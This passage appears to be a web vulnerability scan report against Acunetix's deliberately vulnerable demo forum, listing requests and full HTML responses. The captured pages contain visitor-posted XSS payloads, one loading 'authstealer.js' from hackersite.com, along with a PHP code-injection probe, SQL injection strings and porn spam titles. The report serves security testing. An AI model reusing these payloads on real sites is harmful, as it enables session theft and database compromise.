href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 10037 |
| Response Body - size: 10,037 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>1</td><td>myrnaou3</td><td>3/14/2022 7:22:30 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=1 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3101 |
| Response Body - size: 3,101 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Weather</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Weather </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>301 Moved Permanently</a></div></td><td>1</td><td>WinstonVup</td><td>3/14/2022 5:30:18 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4017 |
| Response Body - size: 4,017 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>ÑайÑ</a></div></td><td>1</td><td>Jamesaidem</td><td>3/13/2022 10:17:25 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>Testing</a></div></td><td>1</td><td> </td><td>3/13/2022 3:11:02 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'><script>doSomethingEvil();</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:31:45 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'><script src=http://hackersite.com/authstealer.js> </script>.</a></div></td><td>1</td><td> </td><td>3/13/2022 3:33:39 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'><script>alert('Hello')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:05 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'><script>alert('BELLO')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:42 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 14602 |
| Response Body - size: 14,602 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- 